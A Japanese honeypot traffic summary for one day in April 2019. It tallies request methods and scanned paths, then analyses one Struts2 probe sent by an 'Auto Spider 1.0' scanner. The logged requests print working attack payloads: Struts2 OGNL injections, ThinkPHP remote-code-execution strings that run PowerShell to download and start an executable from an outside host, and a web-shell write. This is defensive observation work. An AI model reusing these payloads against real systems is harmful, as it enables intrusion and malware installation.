2019-04-24のアクセス数は562件でした。
■送信元IPアドレスの数は 57件です。
■メソッドの一覧と件数は以下です。
method | 総数 |
CONNECT | 4 |
GET | 261 |
HEAD | 2 |
POST | 294 |
PROPFIND | 1 |
合計 結果 | 562 |
■アクセスパス一覧と件数は以下です。
path | method | 総数 |
/ | GET | 41 |
/ | HEAD | 1 |
/ | PROPFIND | 1 |
/_404.php | POST | 1 |
/_query.php | GET | 1 |
/.php | POST | 1 |
/.well-known/security.txt | GET | 1 |
//MyAdmin/scripts/setup.php | GET | 2 |
//phpmyadmin/scripts/setup.php | GET | 2 |
//pma/scripts/setup.php | GET | 1 |
/%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_ MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess %3d%23dm)%3a((%23container%3d%23context%5b%27 com.opensymphony.xwork2.ActionContext.container%27 %5d).(%23ognlUtil%3d%23container.getInstance(%40 com.opensymphony.xwork2.ognl.OgnlUtil%40class)). (%23ognlUtil.getExcludedPackageNames().clear()). (%23ognlUtil.getExcludedClasses().clear()). (%23context.setMemberAccess(%23dm)))). (%23res%3d%40org.apache.struts2.ServletActionContext%40 getResponse()).(%23res.addHeader(%27eresult%27%2c%27 struts2_security_check%27))%7d/index.action | POST | 1 |
/%25%7b(%23dm%3d%40ognl.OgnlContext%40 DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f (%23_memberAccess%3d%23dm)%3a((%23container%3d%23 context%5b%27com.opensymphony.xwork2.ActionContext.container %27%5d).(%23ognlUtil%3d%23container.getInstance (%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)). (%23ognlUtil.getExcludedPackageNames().clear()). (%23ognlUtil.getExcludedClasses().clear()). %23context.setMemberAccess(%23dm)))). (%23res%3d%40org.apache.struts2.ServletActionContext%40 getResponse()).(%23res.addHeader(%27eresult%27%2c %27struts2_security_check%27))%7d/login.action | POST | 1 |
/099.php | POST | 1 |
/1.php | POST | 6 |
/1111.php | POST | 1 |
/12.php | POST | 1 |
/1213.php | POST | 1 |
/123.php | POST | 1 |
/1hou.php | POST | 1 |
/1ndex.php | POST | 1 |
/1q.php | POST | 1 |
/1x.php | GET | 1 |
/2.php | POST | 2 |
/3.php | POST | 1 |
/51.php | POST | 1 |
/51314.php | POST | 1 |
/520.php | POST | 1 |
/5201314.php | POST | 1 |
/56.php | POST | 1 |
/666.php | POST | 1 |
/7.php | POST | 1 |
/777.php | POST | 1 |
/92.php | POST | 1 |
/9510.php | POST | 1 |
/9678.php | POST | 1 |
/a.php | POST | 1 |
/aa.php | POST | 1 |
/aaa.php | POST | 1 |
/aaaa.php | POST | 1 |
/aaaaaa1.php | POST | 1 |
/acadmin.php | GET | 1 |
/admin-scripts.asp | GET | 2 |
/admin/index.php | GET | 1 |
/admin/mysql/index.php | GET | 1 |
/admin/mysql2/index.php | GET | 1 |
/admin/phpMyAdmin/index.php | GET | 3 |
/admin/phpmyadmin2/index.php | GET | 1 |
/admin/pma/index.php | GET | 2 |
/Administrator.php | POST | 1 |
/admn.php | POST | 1 |
/ak.php | POST | 1 |
/ak47.php | POST | 1 |
/ak48.php | POST | 1 |
/Alarg53.php | POST | 1 |
/angge.php | POST | 1 |
/aotu.php | POST | 1 |
/aotu7.php | POST | 1 |
/api.php | POST | 2 |
/app.php | POST | 1 |
/App986ca785.php | POST | 1 |
/appserv.php | GET | 1 |
/aw.php | POST | 1 |
/bak.php | POST | 1 |
/boots.php | POST | 1 |
/cacti/plugins/weathermap/editor.php | GET | 1 |
/cadre.php | POST | 1 |
/cainiao.php | POST | 1 |
/caonma.php | POST | 1 |
/cc.php | POST | 1 |
/cere.php | POST | 1 |
/ceshi.php | POST | 1 |
/cgi-bin/authLogin.cgi | GET | 1 |
/chaoda.php | POST | 1 |
/claroline/phpMyAdmin/index.php | GET | 2 |
/cmd.php | GET | 2 |
/cmd.php | POST | 1 |
/cmdd.php | GET | 1 |
/cmv.php | GET | 1 |
/cn.php | POST | 1 |
/cnm.php | POST | 1 |
/composer.php | GET | 1 |
/composers.php | GET | 1 |
/conf.php | POST | 1 |
/conf1g.php | POST | 1 |
/confg.php | POST | 4 |
/conflg.php | POST | 2 |
/coon.php | POST | 1 |
/core.php | POST | 1 |
/cxfm666.php | POST | 1 |
/d.php | POST | 1 |
/d7.php | GET | 1 |
/data.php | POST | 1 |
/db__.init.php | POST | 1 |
/db_cts.php | GET | 1 |
/db_dataml.php | POST | 1 |
/db_desql.php | POST | 1 |
/db_pma.php | GET | 1 |
/db_session.init.php | POST | 1 |
/db.init.php | POST | 1 |
/db.php | POST | 1 |
/db/index.php | GET | 1 |
/dbadmin/index.php | GET | 1 |
/default.php | POST | 1 |
/defect.php | POST | 1 |
/desktop.ini.php | GET | 1 |
/dexgp.php | POST | 1 |
/diy.php | POST | 1 |
/Drupal.php | GET | 1 |
/erba.php | POST | 1 |
/errors.php | POST | 1 |
/erwa.php | POST | 1 |
/fack.php | POST | 1 |
/favicon.ico | GET | 1 |
/fb.php | POST | 1 |
/feixiang.php | POST | 1 |
/function.inc.php | POST | 1 |
/fusheng.php | POST | 1 |
/general.php | POST | 1 |
/godkey.php | POST | 1 |
/guai.php | POST | 1 |
/h1.php | POST | 1 |
/hack.php | POST | 1 |
/hacly.php | POST | 1 |
/hell.php | GET | 1 |
/hell.php | POST | 1 |
/hello.php | POST | 2 |
/help-e.php | GET | 1 |
/help.php | GET | 1 |
/help.php | POST | 1 |
/hh.php | POST | 1 |
/hm.php | POST | 1 |
/home.php | GET | 1 |
/htdocs.php | GET | 1 |
/htfr.php | POST | 1 |
/hue2.php | GET | 1 |
/HX.php | POST | 1 |
/images/vuln.php | GET | 1 |
/index.action | POST | 7 |
/index.php | GET | 1 |
/index.php?s=/index/\think\app/invokefunction&function= call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP | GET | 1 |
/index1.php | POST | 1 |
/indexa.php | POST | 1 |
/info.php | POST | 1 |
/info1.php | POST | 1 |
/infoo.php | POST | 1 |
/infos.php | POST | 1 |
/ip.php | POST | 1 |
/izom.php | GET | 2 |
/j.php | POST | 1 |
/java.php | GET | 1 |
/knal.php | GET | 1 |
/kvast.php | POST | 1 |
/l6.php | POST | 1 |
/l7.php | POST | 1 |
/l8.php | POST | 1 |
/lala-dpr.php | GET | 1 |
/lala.php | GET | 1 |
/lang.php?f=1 | GET | 1 |
/lanke.php | POST | 1 |
/lanyecn.php | POST | 1 |
/lapan.php | POST | 1 |
/ldw.php | POST | 1 |
/liangchen.php | POST | 1 |
/libraries/joomla/jmail.php?waled=1 | GET | 1 |
/libraries/joomla/jmails.php?waled=1 | GET | 1 |
/libraries/joomla/wl.php?0=1 | GET | 1 |
/license.php | GET | 1 |
/lindex.php | POST | 1 |
/link.php | POST | 1 |
/linkr.php | POST | 1 |
/linkx.php | POST | 1 |
/linux.php | POST | 1 |
/linux1.php | POST | 1 |
/linuxse.php | POST | 1 |
/ljb.php | POST | 1 |
/lm.php | POST | 1 |
/lmn.php | POST | 1 |
/log.php | GET | 1 |
/log.php | POST | 1 |
/login.action | POST | 7 |
/logon.php | GET | 1 |
/lol.php | GET | 1 |
/lost.php | POST | 1 |
/lucky.php | POST | 2 |
/lx.php | POST | 1 |
/m.php | POST | 1 |
/m.php?pbid=open | POST | 1 |
/manager/html | GET | 46 |
/mazi.php | POST | 1 |
/MCLi.php | POST | 2 |
/meng.php | POST | 1 |
/miao.php | POST | 1 |
/min.php | POST | 1 |
/mm.php | POST | 1 |
/muhstik-dpr.php | GET | 1 |
/muhstik.php | GET | 2 |
/muhstik2.php | GET | 1 |
/muhstiks.php | GET | 1 |
/muieblackcat | GET | 1 |
/mx.php | POST | 1 |
/MyAdmin/index.php | GET | 2 |
/myadmin2/index.php | GET | 1 |
/mybestloves.php | POST | 1 |
/mysql_admin/index.php | GET | 1 |
/mysql-admin/index.php | GET | 1 |
/mysql.php | POST | 1 |
/mysql/admin/index.php | GET | 1 |
/mysql/dbadmin/index.php | GET | 1 |
/mysql/index.php | GET | 1 |
/mysql/mysqlmanager/index.php | GET | 1 |
/mysql/sqlmanager/index.php | GET | 1 |
/mysqladmin/index.php | GET | 1 |
/mz.php | POST | 1 |
/neko.php | POST | 1 |
/new_license.php | GET | 1 |
/no.php | POST | 1 |
/nuoxi.php | POST | 1 |
/okokok.php | POST | 1 |
/orange.php | POST | 1 |
/ou2.php | POST | 1 |
/p.php | POST | 1 |
/p34ky1337.php | POST | 1 |
/payload.php | GET | 2 |
/paylog.php | POST | 2 |
/pe.php | POST | 1 |
/php.php | POST | 1 |
/php2MyAdmin/index.php | GET | 1 |
/phpAdmin/index.php | GET | 2 |
/phpiMyAdmin/index.php | GET | 1 |
/phpinfi.php | POST | 1 |
/phpini.php | POST | 1 |
/phpma/index.php | GET | 1 |
/phpmy/index.php | GET | 1 |
/phpMyAbmin/index.php | GET | 1 |
/phpMyAdm1n/index.php | GET | 2 |
/phpMyadmi/index.php | GET | 1 |
/phpMyAdmin__/index.php | GET | 1 |
/phpMyadmin_bak/index.php | GET | 1 |
/phpMyAdmin-4.4.0/index.php | GET | 1 |
/phpmyadmin-old/index.php | GET | 1 |
/phpMyAdmin._/index.php | GET | 1 |
/phpMyAdmin.old/index.php | GET | 1 |
/phpMyAdmin/index.php | GET | 3 |
/phpmyadmin/phpmyadmin/index.php | GET | 3 |
/phpMyAdmin/scripts/db___.init.php | GET | 2 |
/phpmyadmin/scripts/setup.php | GET | 2 |
/phpMyAdmin+++—/index.php | GET | 1 |
/phpmyadmin0/index.php | GET | 1 |
/phpmyadmin1/index.php | GET | 2 |
/phpMyAdmin123/index.php | GET | 1 |
/phpmyadmin2/index.php | GET | 1 |
/phpmyadmin2222/index.php | GET | 1 |
/phpMyAdmina/index.php | GET | 1 |
/phpMyAdminold/index.php | GET | 1 |
/phpMyAdmins/index.php | GET | 1 |
/phpMyAdmion/index.php | GET | 1 |
/phpMydmin/index.php | GET | 1 |
/phpNyAdmin/index.php | GET | 1 |
/phppma/index.php | GET | 1 |
/phpStudy.php | POST | 2 |
/pk1914.php | POST | 1 |
/plugins/weathermap/editor.php | GET | 1 |
/pma-old/index.php | GET | 1 |
/pma.php | POST | 1 |
/pma/index.php | GET | 2 |
/PMA2/index.php | GET | 1 |
/pmamy/index.php | GET | 1 |
/pmamy2/index.php | GET | 1 |
/pmd_online.php | GET | 1 |
/pmd/index.php | GET | 1 |
/post.php | POST | 1 |
/ppp.php | POST | 1 |
/ppx.php | POST | 1 |
/program/index.php | GET | 1 |
/public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20 (new-object%20System.Net.WebClient).DownloadFile (‘http://fid.hognoob.se/download.exe’, ‘C:/Windows/temp/tbtldtctbsjzqhp8813.exe’);start%20 C:/Windows/temp/tbtldtctbsjzqhp8813.exe | GET | 1 |
/public/index.php?s=/index/\think\app/invokefunction&function= call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20 $action%20=%20$_GET[‘xcmd’] | GET | 1 |
/public/index.php?s=index/think\app/invokefunction&function= call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20 /c%20powershell%20(new-object%20System.Net.WebClient). DownloadFile(‘http://fid.hognoob.se/download.exe’, ‘C:/Windows/temp/tbtldtctbsjzqhp8813.exe’);start%20 C:/Windows/temp/tbtldtctbsjzqhp8813.exe | GET | 1 |
/pwd/index.php | GET | 1 |
/python.php | POST | 1 |
/q.php | POST | 3 |
/qa.php | POST | 1 |
/qaq.php | POST | 1 |
/qaz.php | POST | 1 |
/qq.php | POST | 5 |
/qq5262.php | POST | 1 |
/qw.php | POST | 1 |
/qwe.php | POST | 1 |
/qwq.php | POST | 1 |
/qwqw.php | POST | 1 |
/repeat.php | POST | 1 |
/robots.txt | GET | 1 |
/robots.txt | HEAD | 1 |
/ruyi.php | POST | 1 |
/rxr.php | GET | 1 |
/s.php | POST | 2 |
/s/index.php | GET | 1 |
/s1.php | POST | 1 |
/scripts/setup.php | GET | 1 |
/sean.php | POST | 1 |
/sha.php | POST | 1 |
/shaAdmin/index.php | GET | 1 |
/she.php | POST | 1 |
/sheep.php | POST | 1 |
/shell.php | GET | 2 |
/shopdb/index.php | GET | 1 |
/sitemap.xml | GET | 1 |
/Skri.php | POST | 1 |
/sllolx.php | POST | 1 |
/spider.php | GET | 1 |
/ss.php | POST | 2 |
/ssaa.php | POST | 1 |
/sss.php | POST | 2 |
/super.php | POST | 1 |
/system.php | POST | 1 |
/t6nv.php | GET | 1 |
/test.php | GET | 1 |
/test.php | POST | 3 |
/test123.php | POST | 2 |
/text.php | GET | 1 |
/tiandi.php | POST | 1 |
/tmUnblock.cgi | POST | 1 |
/tomcat.php | POST | 1 |
/tools/phpMyAdmin/index.php | GET | 2 |
/toor.php | POST | 1 |
/typo3/phpmyadmin/index.php | GET | 1 |
/u.php | POST | 1 |
/undx.php | GET | 1 |
/up.php | POST | 1 |
/Updata.php | POST | 1 |
/uploader.php | GET | 1 |
/uu.php | POST | 1 |
/uuu.php | POST | 1 |
/v/index.php | GET | 1 |
/ver.php | POST | 1 |
/vuln1.php | POST | 1 |
/w.php | POST | 1 |
/wan.php | POST | 1 |
/wanan.php | POST | 1 |
/wb.php | POST | 1 |
/wc.php | POST | 1 |
/wcp.php | POST | 1 |
/web/phpMyAdmin/index.php | GET | 2 |
/webdav/ | GET | 1 |
/webslee.php | POST | 1 |
/weixiao.php | POST | 1 |
/win.php | POST | 1 |
/win1.php | POST | 1 |
/wp-admins.php | POST | 1 |
/wp-config.php | GET | 1 |
/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php | GET | 1 |
/wpc.php | GET | 1 |
/wpo.php | GET | 1 |
/wshell.php | POST | 1 |
/wuwu11.php | POST | 1 |
/www.php | POST | 1 |
/www/phpMyAdmin/index.php | GET | 2 |
/x.php | GET | 1 |
/x.php | POST | 4 |
/xampp/phpmyadmin/index.php | GET | 1 |
/xiao.php | POST | 1 |
/xiaobin.php | POST | 1 |
/xiaodai.php | POST | 1 |
/xiaohei.php | POST | 1 |
/xiaoma.php | POST | 1 |
/xiaomae.php | POST | 1 |
/xiaomar.php | POST | 1 |
/xiaomo.php | POST | 1 |
/xiaoxi.php | POST | 1 |
/xiaoyu.php | POST | 1 |
/xp.php | POST | 1 |
/xshell.php | POST | 1 |
/xw.php | POST | 1 |
/xw1.php | POST | 1 |
/xx.php | POST | 2 |
/xxx.php | POST | 1 |
/xxxx.php | POST | 1 |
/xz.php | POST | 1 |
/yao.php | POST | 1 |
/yj.php | POST | 1 |
/yumo.php | POST | 1 |
/z.php | GET | 1 |
/z.php | POST | 2 |
/zshmindex.php | POST | 1 |
/zuo.php | POST | 1 |
/zuoindex.php | POST | 1 |
/zuos.php | POST | 1 |
/zuoshou.php | POST | 1 |
/zuoshss.php | POST | 1 |
/zuoss.php | POST | 1 |
/zxc0.php | POST | 1 |
/zxc1.php | POST | 2 |
/zxc2.php | POST | 1 |
/zzk.php | POST | 1 |
/zzz.php | POST | 1 |
cn.bing.com:443 | CONNECT | 1 |
http://110.249.212.46/testget?q=23333&port=80 | GET | 2 |
http://api.ipify.org/ | GET | 1 |
http://httpheader.net/ | GET | 1 |
http://www.123cha.com/ | GET | 1 |
http://www.baidu.com/ | GET | 1 |
http://www.ip.cn/ | GET | 1 |
www.baidu.com:443 | CONNECT | 2 |
www.google.com:443 | CONNECT | 1 |
気になるlog
-=-=19件目のlog=-=-
[2019-04-24 09:52:30+0900] 103.79.155.162 hoge:80 "POST /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action HTTP/1.1" 200 False POST /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action HTTP/1.1 Host: hoge:80 Accept-Language: zh_CN User-Agent: Auto Spider 1.0 Accept-Encoding: gzip, deflate Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded
Struts2の脆弱性（CVE-2017-9791）を狙ったものである。
調査の通信っぽい。よく見るとUser-Agentが"Auto Spider 1.0"になっている。
よくよく見てみると、他にもUser-Agentが"Auto Spider 1.0"のlogがあり、どれもStruts2の脆弱性を狙っていた。